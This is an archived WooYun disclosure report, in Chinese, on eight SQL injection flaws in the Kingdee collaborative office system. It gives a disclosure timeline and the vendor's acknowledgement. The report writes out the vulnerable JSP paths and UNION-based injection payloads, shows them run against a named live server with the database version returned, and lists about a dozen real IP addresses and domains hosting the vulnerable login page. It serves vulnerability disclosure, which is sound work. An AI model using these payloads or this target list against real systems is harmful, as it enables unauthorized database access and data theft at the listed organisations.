乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-26: 细节已通知厂商并且等待厂商处理中 2015-08-26: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向第三方安全合作伙伴开放 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
金蝶协作办公系统存在八个高危SQL注射
存在漏洞的文件为,均可union直接出数据:
/kingdee/tree/tree/announce/get_nodes.jsp?node=1/kingdee/tree/tree/announce/get_selected.jsp?ids=1/kingdee/tree/tree/discuss/get_nodes.jsp?node=1/kingdee/tree/tree/discuss/get_selected.jsp?ids=1/kingdee/tree/tree/news/get_nodes.jsp?node=1/kingdee/tree/tree/news/get_selected.jsp?ids=1/kingdee/tree/tree/rules/get_nodes.jsp?node=1/kingdee/tree/tree/rules/get_selected.jsp?ids=1
漏洞poc
/get_nodes.jsp?node=1 union select NULL,@@version--/get_selected.jsp?ids=1) union select NULL,@@version--
案例非常多,选一个进行证明get_nodes.jsp
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_nodes.jsp?node=1%20union%20select%20NULL,@@version--[{"id":"","text":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n","announce":"","leaf":false,"node_type":"0","announce_name":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n"},]
get_selected.jsp
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_selected.jsp?ids=1) union select NULL,@@version--[[,'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) '],[1,'公司公告']]
给出几个案例:
http://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://122.139.60.103:800/kingdee/login/loginpage.jsphttp://oa.guanhao.com:8080/kingdee/login/loginpage.jsphttp://222.179.238.182:8082/kingdee/login/loginpage2.jsphttp://222.134.77.23:8080/kingdee/login/loginpage.jsphttp://221.4.245.218:8080/kingdee/login/loginpage.jsphttp://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://220.189.244.202:8080/kingdee/login/loginpage.jsphttp://222.133.44.10:8080/kingdee/login/loginpage.jsphttp://223.95.183.6:8080/kingdee/login/loginpage.jsphttp://61.190.20.51/kingdee/login/loginpage.jsphttp://60.194.110.187/kingdee/login/loginpage.jsphttp://oa.roen.cn/kingdee/login/loginpage.jsp
过滤
危害等级:低
漏洞Rank:1
确认时间:2015-08-26 11:35
谢谢对金蝶的关注,此产品为合作伙伴产品,我们已通知相关部门为客户修复。已经有很多此系统的上报漏洞,故rank给的低,请理解。
暂无